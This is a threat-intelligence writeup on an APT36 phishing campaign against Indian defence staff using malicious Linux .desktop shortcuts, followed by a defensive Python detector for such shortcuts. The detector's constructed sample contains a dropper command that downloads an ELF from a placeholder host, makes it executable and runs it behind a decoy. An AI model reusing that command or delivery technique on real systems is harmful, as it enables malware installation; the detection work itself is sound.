CYFIRMA has uncovered a sophisticated cyber-espionage campaign orchestrated by the Pakistan-based threat actor APT36 (aka Transparent Tribe) targeting personnel in India’s defense sector.
More recently, APT36 has shifted its focus to Linux-based environments, particularly targeting systems running BOSS Linux, a distribution widely deployed across Indian government agencies.
The attack chain begins with a phishing email carrying a ZIP attachment. The archive contains a Linux desktop shortcut (.desktop file) whose entry holds a series of commands. When executed, the shortcut triggers a two-stage process: it opens a legitimate PowerPoint presentation as a decoy to maintain a sense of authenticity, while downloading and running a malicious ELF (Executable and Linkable Format) binary in the background.
The malware, named BOSS.elf and saved locally as client.elf, acts as the primary payload, granting attackers unauthorized and persistent access to compromised systems.
Further investigation has identified a domain named sorlastore.com and linked it to the observed campaign. Threat intelligence suggests that the domain and its subdomains have been actively used by APT36 to deliver payloads and maintain command-and-control communication channels during targeted intrusions.
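As an added defensive example (not code from CYFIRMA's report), the following Python check parses a .desktop file and flags the decoy-plus-download-and-execute pattern described above, so it can be run over shortcuts extracted from mail attachments. The sample entry and the c2.example.invalid URL are constructed placeholders, not the campaign's real artefacts.

```python
import re
from typing import Dict, List

# Constructed sample mirroring the described chain (decoy PPTX, background ELF); not a real artefact.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Briefing.pptx
Icon=libreoffice-impress
Terminal=false
Exec=bash -c "xdg-open /tmp/Briefing.pptx; curl -s http://c2.example.invalid/BOSS.elf -o /tmp/client.elf; chmod +x /tmp/client.elf; /tmp/client.elf &"
"""

# Constructed benign entry for comparison.
BENIGN_DESKTOP = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\n"

# Indicators a defender looks for in the Exec line of a .desktop file.
INDICATORS = {
    "shell_wrapper": re.compile(r"\b(?:ba)?sh\s+-c\b"),
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "mark_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"),
    "exec_from_tmp": re.compile(r"(?:^|[;&|\s])/(?:tmp|dev/shm|var/tmp)/\S+"),
    "backgrounded": re.compile(r"&\s*(?:\"|')?\s*$"),
    "decoy_document": re.compile(r"\b(?:xdg-open|libreoffice)\b.*?\.(?:pptx?|docx?|pdf)\b", re.I),
}

def parse_desktop(text: str) -> Dict[str, str]:
    """Return key=value pairs from the [Desktop Entry] group only."""
    entries: Dict[str, str] = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries

def analyse_desktop(text: str) -> List[str]:
    """Return the indicator names triggered by the shortcut's Exec line and metadata."""
    entries = parse_desktop(text)
    exec_line = entries.get("Exec", "")
    hits = [name for name, pat in INDICATORS.items() if pat.search(exec_line)]
    # An application entry whose display name ends in a document extension is a lure.
    if entries.get("Type") == "Application" and re.search(r"\.(?:pptx?|docx?|pdf)$", entries.get("Name", ""), re.I):
        hits.append("document_lookalike_name")
    return hits

def is_dropper_like(hits: List[str]) -> bool:
    """Alert only on download combined with execution from a writable path or a chmod +x."""
    return "downloader" in hits and ("exec_from_tmp" in hits or "mark_executable" in hits)
```

A single downloader or decoy hit is weak on its own; the alert condition in `is_dropper_like` requires the download to be paired with execution of the fetched file.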